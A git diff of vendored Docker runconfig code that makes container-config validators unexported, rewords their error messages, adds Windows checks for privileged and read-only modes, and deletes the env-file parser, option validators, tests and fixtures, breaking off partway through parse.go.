 	if !hc.Isolation.IsValid() {
-		return fmt.Errorf("invalid --isolation: %q - %s only supports 'default'", hc.Isolation, runtime.GOOS)
+		return fmt.Errorf("Invalid isolation: %q - %s only supports 'default'", hc.Isolation, runtime.GOOS)
 	}
 	return nil
 }
 
-// ValidateQoS performs platform specific validation of the QoS settings
-func ValidateQoS(hc *container.HostConfig) error {
+// validateQoS performs platform specific validation of the QoS settings
+func validateQoS(hc *container.HostConfig) error {
 	// We may not be passed a host config, such as in the case of docker commit
 	if hc == nil {
 		return nil
 	}
 
 	if hc.IOMaximumBandwidth != 0 {
-		return fmt.Errorf("invalid QoS settings: %s does not support --io-maxbandwidth", runtime.GOOS)
+		return fmt.Errorf("Invalid QoS settings: %s does not support configuration of maximum bandwidth", runtime.GOOS)
 	}
 
 	if hc.IOMaximumIOps != 0 {
-		return fmt.Errorf("invalid QoS settings: %s does not support --io-maxiops", runtime.GOOS)
+		return fmt.Errorf("Invalid QoS settings: %s does not support configuration of maximum IOPs", runtime.GOOS)
 	}
 	return nil
 }
 
-// ValidateResources performs platform specific validation of the resource settings
+// validateResources performs platform specific validation of the resource settings
 // cpu-rt-runtime and cpu-rt-period can not be greater than their parent, cpu-rt-runtime requires sys_nice
-func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error {
+func validateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error {
 	// We may not be passed a host config, such as in the case of docker commit
 	if hc == nil {
 		return nil
 	}
 
 	if hc.Resources.CPURealtimePeriod > 0 && !si.CPURealtimePeriod {
-		return fmt.Errorf("invalid --cpu-rt-period: Your kernel does not support cgroup rt period")
+		return fmt.Errorf("Your kernel does not support cgroup cpu real-time period")
 	}
 
 	if hc.Resources.CPURealtimeRuntime > 0 && !si.CPURealtimeRuntime {
-		return fmt.Errorf("invalid --cpu-rt-runtime: Your kernel does not support cgroup rt runtime")
+		return fmt.Errorf("Your kernel does not support cgroup cpu real-time runtime")
 	}
 
 	if hc.Resources.CPURealtimePeriod != 0 && hc.Resources.CPURealtimeRuntime != 0 && hc.Resources.CPURealtimeRuntime > hc.Resources.CPURealtimePeriod {
-		return fmt.Errorf("invalid --cpu-rt-runtime: rt runtime cannot be higher than rt period")
+		return fmt.Errorf("cpu real-time runtime cannot be higher than cpu real-time period")
 	}
 	return nil
 }
+
+// validatePrivileged performs platform specific validation of the Privileged setting
+func validatePrivileged(hc *container.HostConfig) error {
+	return nil
+}
+
+// validateReadonlyRootfs performs platform specific validation of the ReadonlyRootfs setting
+func validateReadonlyRootfs(hc *container.HostConfig) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go
index 91bd6dcc3c..33a4668af1 100644
--- a/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go
@@ -1,8 +1,7 @@
-package runconfig
+package runconfig // import "github.com/docker/docker/runconfig"
 
 import (
 	"fmt"
-	"strings"
 
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/pkg/sysinfo"
@@ -19,50 +18,79 @@ func IsPreDefinedNetwork(network string) bool {
 	return !container.NetworkMode(network).IsUserDefined()
 }
 
-// ValidateNetMode ensures that the various combinations of requested
+// validateNetMode ensures that the various combinations of requested
 // network settings are valid.
-func ValidateNetMode(c *container.Config, hc *container.HostConfig) error {
+func validateNetMode(c *container.Config, hc *container.HostConfig) error {
 	if hc == nil {
 		return nil
 	}
-	parts := strings.Split(string(hc.NetworkMode), ":")
-	if len(parts) > 1 {
-		return fmt.Errorf("invalid --net: %s", hc.NetworkMode)
+
+	err := validateNetContainerMode(c, hc)
+	if err != nil {
+		return err
+	}
+
+	if hc.NetworkMode.IsContainer() && hc.Isolation.IsHyperV() {
+		return fmt.Errorf("Using the network stack of another container is not supported while using Hyper-V Containers")
 	}
+
 	return nil
 }
 
-// ValidateIsolation performs platform specific validation of the
+// validateIsolation performs platform specific validation of the
 // isolation in the hostconfig structure. Windows supports 'default' (or
 // blank), 'process', or 'hyperv'.
-func ValidateIsolation(hc *container.HostConfig) error {
+func validateIsolation(hc *container.HostConfig) error {
 	// We may not be passed a host config, such as in the case of docker commit
 	if hc == nil {
 		return nil
 	}
 	if !hc.Isolation.IsValid() {
-		return fmt.Errorf("invalid --isolation: %q. Windows supports 'default', 'process', or 'hyperv'", hc.Isolation)
+		return fmt.Errorf("Invalid isolation: %q. Windows supports 'default', 'process', or 'hyperv'", hc.Isolation)
 	}
 	return nil
 }
 
-// ValidateQoS performs platform specific validation of the Qos settings
-func ValidateQoS(hc *container.HostConfig) error {
+// validateQoS performs platform specific validation of the Qos settings
+func validateQoS(hc *container.HostConfig) error {
 	return nil
 }
 
-// ValidateResources performs platform specific validation of the resource settings
-func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error {
+// validateResources performs platform specific validation of the resource settings
+func validateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error {
 	// We may not be passed a host config, such as in the case of docker commit
 	if hc == nil {
 		return nil
 	}
-
 	if hc.Resources.CPURealtimePeriod != 0 {
-		return fmt.Errorf("invalid --cpu-rt-period: Windows does not support this feature")
+		return fmt.Errorf("Windows does not support CPU real-time period")
 	}
 	if hc.Resources.CPURealtimeRuntime != 0 {
-		return fmt.Errorf("invalid --cpu-rt-runtime: Windows does not support this feature")
+		return fmt.Errorf("Windows does not support CPU real-time runtime")
+	}
+	return nil
+}
+
+// validatePrivileged performs platform specific validation of the Privileged setting
+func validatePrivileged(hc *container.HostConfig) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	if hc == nil {
+		return nil
+	}
+	if hc.Privileged {
+		return fmt.Errorf("Windows does not support privileged mode")
+	}
+	return nil
+}
+
+// validateReadonlyRootfs performs platform specific validation of the ReadonlyRootfs setting
+func validateReadonlyRootfs(hc *container.HostConfig) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	if hc == nil {
+		return nil
+	}
+	if hc.ReadonlyRootfs {
+		return fmt.Errorf("Windows does not support root filesystem in read-only mode")
 	}
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go b/vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go
new file mode 100644
index 0000000000..d7a480f313
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go
@@ -0,0 +1,17 @@
+// +build windows
+
+package runconfig // import "github.com/docker/docker/runconfig"
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types/container"
+)
+
+func TestValidatePrivileged(t *testing.T) {
+	expected := "Windows does not support privileged mode"
+	err := validatePrivileged(&container.HostConfig{Privileged: true})
+	if err == nil || err.Error() != expected {
+		t.Fatalf("Expected %s", expected)
+	}
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile.go b/vendor/github.com/docker/docker/runconfig/opts/envfile.go
deleted file mode 100644
index f723799215..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/envfile.go
+++ /dev/null
@@ -1,81 +0,0 @@
-package opts
-
-import (
-	"bufio"
-	"bytes"
-	"fmt"
-	"os"
-	"strings"
-	"unicode"
-	"unicode/utf8"
-)
-
-// ParseEnvFile reads a file with environment variables enumerated by lines
-//
-// ``Environment variable names used by the utilities in the Shell and
-// Utilities volume of IEEE Std 1003.1-2001 consist solely of uppercase
-// letters, digits, and the '_' (underscore) from the characters defined in
-// Portable Character Set and do not begin with a digit. *But*, other
-// characters may be permitted by an implementation; applications shall
-// tolerate the presence of such names.''
-// -- http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap08.html
-//
-// As of #16585, it's up to application inside docker to validate or not
-// environment variables, that's why we just strip leading whitespace and
-// nothing more.
-func ParseEnvFile(filename string) ([]string, error) {
-	fh, err := os.Open(filename)
-	if err != nil {
-		return []string{}, err
-	}
-	defer fh.Close()
-
-	lines := []string{}
-	scanner := bufio.NewScanner(fh)
-	currentLine := 0
-	utf8bom := []byte{0xEF, 0xBB, 0xBF}
-	for scanner.Scan() {
-		scannedBytes := scanner.Bytes()
-		if !utf8.Valid(scannedBytes) {
-			return []string{}, fmt.Errorf("env file %s contains invalid utf8 bytes at line %d: %v", filename, currentLine+1, scannedBytes)
-		}
-		// We trim UTF8 BOM
-		if currentLine == 0 {
-			scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom)
-		}
-		// trim the line from all leading whitespace first
-		line := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace)
-		currentLine++
-		// line is not empty, and not starting with '#'
-		if len(line) > 0 && !strings.HasPrefix(line, "#") {
-			data := strings.SplitN(line, "=", 2)
-
-			// trim the front of a variable, but nothing else
-			variable := strings.TrimLeft(data[0], whiteSpaces)
-			if strings.ContainsAny(variable, whiteSpaces) {
-				return []string{}, ErrBadEnvVariable{fmt.Sprintf("variable '%s' has white spaces", variable)}
-			}
-
-			if len(data) > 1 {
-
-				// pass the value through, no trimming
-				lines = append(lines, fmt.Sprintf("%s=%s", variable, data[1]))
-			} else {
-				// if only a pass-through variable is given, clean it up.
-				lines = append(lines, fmt.Sprintf("%s=%s", strings.TrimSpace(line), os.Getenv(line)))
-			}
-		}
-	}
-	return lines, scanner.Err()
-}
-
-var whiteSpaces = " \t"
-
-// ErrBadEnvVariable typed error for bad environment variable
-type ErrBadEnvVariable struct {
-	msg string
-}
-
-func (e ErrBadEnvVariable) Error() string {
-	return fmt.Sprintf("poorly formatted environment: %s", e.msg)
-}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go b/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go
deleted file mode 100644
index 5dd7078bc0..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go
+++ /dev/null
@@ -1,142 +0,0 @@
-package opts
-
-import (
-	"bufio"
-	"fmt"
-	"io/ioutil"
-	"os"
-	"reflect"
-	"strings"
-	"testing"
-)
-
-func tmpFileWithContent(content string, t *testing.T) string {
-	tmpFile, err := ioutil.TempFile("", "envfile-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer tmpFile.Close()
-
-	tmpFile.WriteString(content)
-	return tmpFile.Name()
-}
-
-// Test ParseEnvFile for a file with a few well formatted lines
-func TestParseEnvFileGoodFile(t *testing.T) {
-	content := `foo=bar
-    baz=quux
-# comment
-
-_foobar=foobaz
-with.dots=working
-and_underscore=working too
-`
-	// Adding a newline + a line with pure whitespace.
-	// This is being done like this instead of the block above
-	// because it's common for editors to trim trailing whitespace
-	// from lines, which becomes annoying since that's the
-	// exact thing we need to test.
-	content += "\n    \t  "
-	tmpFile := tmpFileWithContent(content, t)
-	defer os.Remove(tmpFile)
-
-	lines, err := ParseEnvFile(tmpFile)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	expectedLines := []string{
-		"foo=bar",
-		"baz=quux",
-		"_foobar=foobaz",
-		"with.dots=working",
-		"and_underscore=working too",
-	}
-
-	if !reflect.DeepEqual(lines, expectedLines) {
-		t.Fatal("lines not equal to expected_lines")
-	}
-}
-
-// Test ParseEnvFile for an empty file
-func TestParseEnvFileEmptyFile(t *testing.T) {
-	tmpFile := tmpFileWithContent("", t)
-	defer os.Remove(tmpFile)
-
-	lines, err := ParseEnvFile(tmpFile)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if len(lines) != 0 {
-		t.Fatal("lines not empty; expected empty")
-	}
-}
-
-// Test ParseEnvFile for a non existent file
-func TestParseEnvFileNonExistentFile(t *testing.T) {
-	_, err := ParseEnvFile("foo_bar_baz")
-	if err == nil {
-		t.Fatal("ParseEnvFile succeeded; expected failure")
-	}
-	if _, ok := err.(*os.PathError); !ok {
-		t.Fatalf("Expected a PathError, got [%v]", err)
-	}
-}
-
-// Test ParseEnvFile for a badly formatted file
-func TestParseEnvFileBadlyFormattedFile(t *testing.T) {
-	content := `foo=bar
-    f   =quux
-`
-
-	tmpFile := tmpFileWithContent(content, t)
-	defer os.Remove(tmpFile)
-
-	_, err := ParseEnvFile(tmpFile)
-	if err == nil {
-		t.Fatalf("Expected an ErrBadEnvVariable, got nothing")
-	}
-	if _, ok := err.(ErrBadEnvVariable); !ok {
-		t.Fatalf("Expected an ErrBadEnvVariable, got [%v]", err)
-	}
-	expectedMessage := "poorly formatted environment: variable 'f   ' has white spaces"
-	if err.Error() != expectedMessage {
-		t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error())
-	}
-}
-
-// Test ParseEnvFile for a file with a line exceeding bufio.MaxScanTokenSize
-func TestParseEnvFileLineTooLongFile(t *testing.T) {
-	content := strings.Repeat("a", bufio.MaxScanTokenSize+42)
-	content = fmt.Sprint("foo=", content)
-
-	tmpFile := tmpFileWithContent(content, t)
-	defer os.Remove(tmpFile)
-
-	_, err := ParseEnvFile(tmpFile)
-	if err == nil {
-		t.Fatal("ParseEnvFile succeeded; expected failure")
-	}
-}
-
-// ParseEnvFile with a random file, pass through
-func TestParseEnvFileRandomFile(t *testing.T) {
-	content := `first line
-another invalid line`
-	tmpFile := tmpFileWithContent(content, t)
-	defer os.Remove(tmpFile)
-
-	_, err := ParseEnvFile(tmpFile)
-
-	if err == nil {
-		t.Fatalf("Expected an ErrBadEnvVariable, got nothing")
-	}
-	if _, ok := err.(ErrBadEnvVariable); !ok {
-		t.Fatalf("Expected an ErrBadEnvvariable, got [%v]", err)
-	}
-	expectedMessage := "poorly formatted environment: variable 'first line' has white spaces"
-	if err.Error() != expectedMessage {
-		t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error())
-	}
-}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env
deleted file mode 100755
index 3a73358fffbc0d5d3d4df985ccf2f4a1a29cdb2a..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 54
ucmezW&yB$!2yGdh7#tab7<d`D7(5tU8GL{cB)TG@HWDNTk+o%js0IKq+6kus

diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env
deleted file mode 100755
index e523da7af4dab0636ed73fabf730f33a1cb915b4..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 54
ucmezOpTUj69|&z3oERJ#f*5!ixEMSbTp4_T5Gb0kBC-}N29dRes0IKkq6wz}

diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env
deleted file mode 100755
index 1ce45055b7..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env
+++ /dev/null
@@ -1,3 +0,0 @@
-FOO=BAR
-HELLO=您好
-BAR=FOO
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env
deleted file mode 100644
index 3afbdc81c2..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env
+++ /dev/null
@@ -1 +0,0 @@
-ENV1=value1
diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label b/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label
deleted file mode 100644
index b4208bdf8f..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label
+++ /dev/null
@@ -1 +0,0 @@
-LABEL1=value1
diff --git a/vendor/github.com/docker/docker/runconfig/opts/opts.go b/vendor/github.com/docker/docker/runconfig/opts/opts.go
deleted file mode 100644
index cae0432f05..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/opts.go
+++ /dev/null
@@ -1,83 +0,0 @@
-package opts
-
-import (
-	"fmt"
-	"net"
-	"os"
-	"runtime"
-	"strings"
-
-	fopts "github.com/docker/docker/opts"
-)
-
-// ValidateAttach validates that the specified string is a valid attach option.
-func ValidateAttach(val string) (string, error) {
-	s := strings.ToLower(val)
-	for _, str := range []string{"stdin", "stdout", "stderr"} {
-		if s == str {
-			return s, nil
-		}
-	}
-	return val, fmt.Errorf("valid streams are STDIN, STDOUT and STDERR")
-}
-
-// ValidateEnv validates an environment variable and returns it.
-// If no value is specified, it returns the current value using os.Getenv.
-//
-// As on ParseEnvFile and related to #16585, environment variable names
-// are not validate what so ever, it's up to application inside docker
-// to validate them or not.
-//
-// The only validation here is to check if name is empty, per #25099
-func ValidateEnv(val string) (string, error) {
-	arr := strings.Split(val, "=")
-	if arr[0] == "" {
-		return "", fmt.Errorf("invalid environment variable: %s", val)
-	}
-	if len(arr) > 1 {
-		return val, nil
-	}
-	if !doesEnvExist(val) {
-		return val, nil
-	}
-	return fmt.Sprintf("%s=%s", val, os.Getenv(val)), nil
-}
-
-func doesEnvExist(name string) bool {
-	for _, entry := range os.Environ() {
-		parts := strings.SplitN(entry, "=", 2)
-		if runtime.GOOS == "windows" {
-			// Environment variable are case-insensitive on Windows. PaTh, path and PATH are equivalent.
-			if strings.EqualFold(parts[0], name) {
-				return true
-			}
-		}
-		if parts[0] == name {
-			return true
-		}
-	}
-	return false
-}
-
-// ValidateExtraHost validates that the specified string is a valid extrahost and returns it.
-// ExtraHost is in the form of name:ip where the ip has to be a valid ip (IPv4 or IPv6).
-func ValidateExtraHost(val string) (string, error) {
-	// allow for IPv6 addresses in extra hosts by only splitting on first ":"
-	arr := strings.SplitN(val, ":", 2)
-	if len(arr) != 2 || len(arr[0]) == 0 {
-		return "", fmt.Errorf("bad format for add-host: %q", val)
-	}
-	if _, err := fopts.ValidateIPAddress(arr[1]); err != nil {
-		return "", fmt.Errorf("invalid IP address in add-host: %q", arr[1])
-	}
-	return val, nil
-}
-
-// ValidateMACAddress validates a MAC address.
-func ValidateMACAddress(val string) (string, error) {
-	_, err := net.ParseMAC(strings.TrimSpace(val))
-	if err != nil {
-		return "", err
-	}
-	return val, nil
-}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/opts_test.go b/vendor/github.com/docker/docker/runconfig/opts/opts_test.go
deleted file mode 100644
index 43f8730fc4..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/opts_test.go
+++ /dev/null
@@ -1,113 +0,0 @@
-package opts
-
-import (
-	"fmt"
-	"os"
-	"runtime"
-	"strings"
-	"testing"
-)
-
-func TestValidateAttach(t *testing.T) {
-	valid := []string{
-		"stdin",
-		"stdout",
-		"stderr",
-		"STDIN",
-		"STDOUT",
-		"STDERR",
-	}
-	if _, err := ValidateAttach("invalid"); err == nil {
-		t.Fatalf("Expected error with [valid streams are STDIN, STDOUT and STDERR], got nothing")
-	}
-
-	for _, attach := range valid {
-		value, err := ValidateAttach(attach)
-		if err != nil {
-			t.Fatal(err)
-		}
-		if value != strings.ToLower(attach) {
-			t.Fatalf("Expected [%v], got [%v]", attach, value)
-		}
-	}
-}
-
-func TestValidateEnv(t *testing.T) {
-	valids := map[string]string{
-		"a":                   "a",
-		"something":           "something",
-		"_=a":                 "_=a",
-		"env1=value1":         "env1=value1",
-		"_env1=value1":        "_env1=value1",
-		"env2=value2=value3":  "env2=value2=value3",
-		"env3=abc!qwe":        "env3=abc!qwe",
-		"env_4=value 4":       "env_4=value 4",
-		"PATH":                fmt.Sprintf("PATH=%v", os.Getenv("PATH")),
-		"PATH=something":      "PATH=something",
-		"asd!qwe":             "asd!qwe",
-		"1asd":                "1asd",
-		"123":                 "123",
-		"some space":          "some space",
-		"  some space before": "  some space before",
-		"some space after  ":  "some space after  ",
-	}
-	// Environment variables are case in-sensitive on Windows
-	if runtime.GOOS == "windows" {
-		valids["PaTh"] = fmt.Sprintf("PaTh=%v", os.Getenv("PATH"))
-	}
-	for value, expected := range valids {
-		actual, err := ValidateEnv(value)
-		if err != nil {
-			t.Fatal(err)
-		}
-		if actual != expected {
-			t.Fatalf("Expected [%v], got [%v]", expected, actual)
-		}
-	}
-}
-
-func TestValidateExtraHosts(t *testing.T) {
-	valid := []string{
-		`myhost:192.168.0.1`,
-		`thathost:10.0.2.1`,
-		`anipv6host:2003:ab34:e::1`,
-		`ipv6local:::1`,
-	}
-
-	invalid := map[string]string{
-		`myhost:192.notanipaddress.1`:  `invalid IP`,
-		`thathost-nosemicolon10.0.0.1`: `bad format`,
-		`anipv6host:::::1`:             `invalid IP`,
-		`ipv6local:::0::`:              `invalid IP`,
-	}
-
-	for _, extrahost := range valid {
-		if _, err := ValidateExtraHost(extrahost); err != nil {
-			t.Fatalf("ValidateExtraHost(`"+extrahost+"`) should succeed: error %v", err)
-		}
-	}
-
-	for extraHost, expectedError := range invalid {
-		if _, err := ValidateExtraHost(extraHost); err == nil {
-			t.Fatalf("ValidateExtraHost(`%q`) should have failed validation", extraHost)
-		} else {
-			if !strings.Contains(err.Error(), expectedError) {
-				t.Fatalf("ValidateExtraHost(`%q`) error should contain %q", extraHost, expectedError)
-			}
-		}
-	}
-}
-
-func TestValidateMACAddress(t *testing.T) {
-	if _, err := ValidateMACAddress(`92:d0:c6:0a:29:33`); err != nil {
-		t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:29:33`) got %s", err)
-	}
-
-	if _, err := ValidateMACAddress(`92:d0:c6:0a:33`); err == nil {
-		t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:33`) succeeded; expected failure on invalid MAC")
-	}
-
-	if _, err := ValidateMACAddress(`random invalid string`); err == nil {
-		t.Fatalf("ValidateMACAddress(`random invalid string`) succeeded; expected failure on invalid MAC")
-	}
-}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse.go b/vendor/github.com/docker/docker/runconfig/opts/parse.go
index 71a89277ec..8f7baeb637 100644
--- a/vendor/github.com/docker/docker/runconfig/opts/parse.go
+++ b/vendor/github.com/docker/docker/runconfig/opts/parse.go
@@ -1,695 +1,9 @@
-package opts
+package opts // import "github.com/docker/docker/runconfig/opts"
 
 import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"io/ioutil"
-	"path"
-	"strconv"
 	"strings"
-	"time"
-
-	"github.com/docker/docker/api/types/container"
-	networktypes "github.com/docker/docker/api/types/network"
-	"github.com/docker/docker/api/types/strslice"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/signal"
-	"github.com/docker/go-connections/nat"
-	units "github.com/docker/go-units"
-	"github.com/spf13/pflag"
 )
 
-// ContainerOptions is a data object with all the options for creating a container
-type ContainerOptions struct {
-	attach             opts.ListOpts
-	volumes            opts.ListOpts
-	tmpfs              opts.ListOpts
-	blkioWeightDevice  WeightdeviceOpt
-	deviceReadBps      ThrottledeviceOpt
-	deviceWriteBps     ThrottledeviceOpt
-	links              opts.ListOpts
-	aliases            opts.ListOpts
-	linkLocalIPs       opts.ListOpts
-	deviceReadIOps     ThrottledeviceOpt
-	deviceWriteIOps    ThrottledeviceOpt
-	env                opts.ListOpts
-	labels             opts.ListOpts
-	devices            opts.ListOpts
-	ulimits            *UlimitOpt
-	sysctls            *opts.MapOpts
-	publish            opts.ListOpts
-	expose             opts.ListOpts
-	dns                opts.ListOpts
-	dnsSearch          opts.ListOpts
-	dnsOptions         opts.ListOpts
-	extraHosts         opts.ListOpts
-	volumesFrom        opts.ListOpts
-	envFile            opts.ListOpts
-	capAdd             opts.ListOpts
-	capDrop            opts.ListOpts
-	groupAdd           opts.ListOpts
-	securityOpt        opts.ListOpts
-	storageOpt         opts.ListOpts
-	labelsFile         opts.ListOpts
-	loggingOpts        opts.ListOpts
-	privileged         bool
-	pidMode            string
-	utsMode            string
-	usernsMode         string
-	publishAll         bool
-	stdin              bool
-	tty                bool
-	oomKillDisable     bool
-	oomScoreAdj        int
-	containerIDFile    string
-	entrypoint         string
-	hostname           string
-	memoryString       string
-	memoryReservation  string
-	memorySwap         string
-	kernelMemory       string
-	user               string
-	workingDir         string
-	cpuCount           int64
-	cpuShares          int64
-	cpuPercent         int64
-	cpuPeriod          int64
-	cpuRealtimePeriod  int64
-	cpuRealtimeRuntime int64
-	cpuQuota           int64
-	cpus               opts.NanoCPUs
-	cpusetCpus         string
-	cpusetMems         string
-	blkioWeight        uint16
-	ioMaxBandwidth     string
-	ioMaxIOps          uint64
-	swappiness         int64
-	netMode            string
-	macAddress         string
-	ipv4Address        string
-	ipv6Address        string
-	ipcMode            string
-	pidsLimit          int64
-	restartPolicy      string
-	readonlyRootfs     bool
-	loggingDriver      string
-	cgroupParent       string
-	volumeDriver       string
-	stopSignal         string
-	stopTimeout        int
-	isolation          string
-	shmSize            string
-	noHealthcheck      bool
-	healthCmd          string
-	healthInterval     time.Duration
-	healthTimeout      time.Duration
-	healthRetries      int
-	runtime            string
-	autoRemove         bool
-	init               bool
-	initPath           string
-	credentialSpec     string
-
-	Image string
-	Args  []string
-}
-
-// AddFlags adds all command line flags that will be used by Parse to the FlagSet
-func AddFlags(flags *pflag.FlagSet) *ContainerOptions {
-	copts := &ContainerOptions{
-		aliases:           opts.NewListOpts(nil),
-		attach:            opts.NewListOpts(ValidateAttach),
-		blkioWeightDevice: NewWeightdeviceOpt(ValidateWeightDevice),
-		capAdd:            opts.NewListOpts(nil),
-		capDrop:           opts.NewListOpts(nil),
-		dns:               opts.NewListOpts(opts.ValidateIPAddress),
-		dnsOptions:        opts.NewListOpts(nil),
-		dnsSearch:         opts.NewListOpts(opts.ValidateDNSSearch),
-		deviceReadBps:     NewThrottledeviceOpt(ValidateThrottleBpsDevice),
-		deviceReadIOps:    NewThrottledeviceOpt(ValidateThrottleIOpsDevice),
-		deviceWriteBps:    NewThrottledeviceOpt(ValidateThrottleBpsDevice),
-		deviceWriteIOps:   NewThrottledeviceOpt(ValidateThrottleIOpsDevice),
-		devices:           opts.NewListOpts(ValidateDevice),
-		env:               opts.NewListOpts(ValidateEnv),
-		envFile:           opts.NewListOpts(nil),
-		expose:            opts.NewListOpts(nil),
-		extraHosts:        opts.NewListOpts(ValidateExtraHost),
-		groupAdd:          opts.NewListOpts(nil),
-		labels:            opts.NewListOpts(ValidateEnv),
-		labelsFile:        opts.NewListOpts(nil),
-		linkLocalIPs:      opts.NewListOpts(nil),
-		links:             opts.NewListOpts(ValidateLink),
-		loggingOpts:       opts.NewListOpts(nil),
-		publish:           opts.NewListOpts(nil),
-		securityOpt:       opts.NewListOpts(nil),
-		storageOpt:        opts.NewListOpts(nil),
-		sysctls:           opts.NewMapOpts(nil, opts.ValidateSysctl),
-		tmpfs:             opts.NewListOpts(nil),
-		ulimits:           NewUlimitOpt(nil),
-		volumes:           opts.NewListOpts(nil),
-		volumesFrom:       opts.NewListOpts(nil),
-	}
-
-	// General purpose flags
-	flags.VarP(&copts.attach, "attach", "a", "Attach to STDIN, STDOUT or STDERR")
-	flags.Var(&copts.devices, "device", "Add a host device to the container")
-	flags.VarP(&copts.env, "env", "e", "Set environment variables")
-	flags.Var(&copts.envFile, "env-file", "Read in a file of environment variables")
-	flags.StringVar(&copts.entrypoint, "entrypoint", "", "Overwrite the default ENTRYPOINT of the image")
-	flags.Var(&copts.groupAdd, "group-add", "Add additional groups to join")
-	flags.StringVarP(&copts.hostname, "hostname", "h", "", "Container host name")
-	flags.BoolVarP(&copts.stdin, "interactive", "i", false, "Keep STDIN open even if not attached")
-	flags.VarP(&copts.labels, "label", "l", "Set meta data on a container")
-	flags.Var(&copts.labelsFile, "label-file", "Read in a line delimited file of labels")
-	flags.BoolVar(&copts.readonlyRootfs, "read-only", false, "Mount the container's root filesystem as read only")
-	flags.StringVar(&copts.restartPolicy, "restart", "no", "Restart policy to apply when a container exits")
-	flags.StringVar(&copts.stopSignal, "stop-signal", signal.DefaultStopSignal, fmt.Sprintf("Signal to stop a container, %v by default", signal.DefaultStopSignal))
-	flags.IntVar(&copts.stopTimeout, "stop-timeout", 0, "Timeout (in seconds) to stop a container")
-	flags.SetAnnotation("stop-timeout", "version", []string{"1.25"})
-	flags.Var(copts.sysctls, "sysctl", "Sysctl options")
-	flags.BoolVarP(&copts.tty, "tty", "t", false, "Allocate a pseudo-TTY")
-	flags.Var(copts.ulimits, "ulimit", "Ulimit options")
-	flags.StringVarP(&copts.user, "user", "u", "", "Username or UID (format: <name|uid>[:<group|gid>])")
-	flags.StringVarP(&copts.workingDir, "workdir", "w", "", "Working directory inside the container")
-	flags.BoolVar(&copts.autoRemove, "rm", false, "Automatically remove the container when it exits")
-
-	// Security
-	flags.Var(&copts.capAdd, "cap-add", "Add Linux capabilities")
-	flags.Var(&copts.capDrop, "cap-drop", "Drop Linux capabilities")
-	flags.BoolVar(&copts.privileged, "privileged", false, "Give extended privileges to this container")
-	flags.Var(&copts.securityOpt, "security-opt", "Security Options")
-	flags.StringVar(&copts.usernsMode, "userns", "", "User namespace to use")
-	flags.StringVar(&copts.credentialSpec, "credentialspec", "", "Credential spec for managed service account (Windows only)")
-
-	// Network and port publishing flag
-	flags.Var(&copts.extraHosts, "add-host", "Add a custom host-to-IP mapping (host:ip)")
-	flags.Var(&copts.dns, "dns", "Set custom DNS servers")
-	// We allow for both "--dns-opt" and "--dns-option", although the latter is the recommended way.
-	// This is to be consistent with service create/update
-	flags.Var(&copts.dnsOptions, "dns-opt", "Set DNS options")
-	flags.Var(&copts.dnsOptions, "dns-option", "Set DNS options")
-	flags.MarkHidden("dns-opt")
-	flags.Var(&copts.dnsSearch, "dns-search", "Set custom DNS search domains")
-	flags.Var(&copts.expose, "expose", "Expose a port or a range of ports")
-	flags.StringVar(&copts.ipv4Address, "ip", "", "Container IPv4 address (e.g. 172.30.100.104)")
-	flags.StringVar(&copts.ipv6Address, "ip6", "", "Container IPv6 address (e.g. 2001:db8::33)")
-	flags.Var(&copts.links, "link", "Add link to another container")
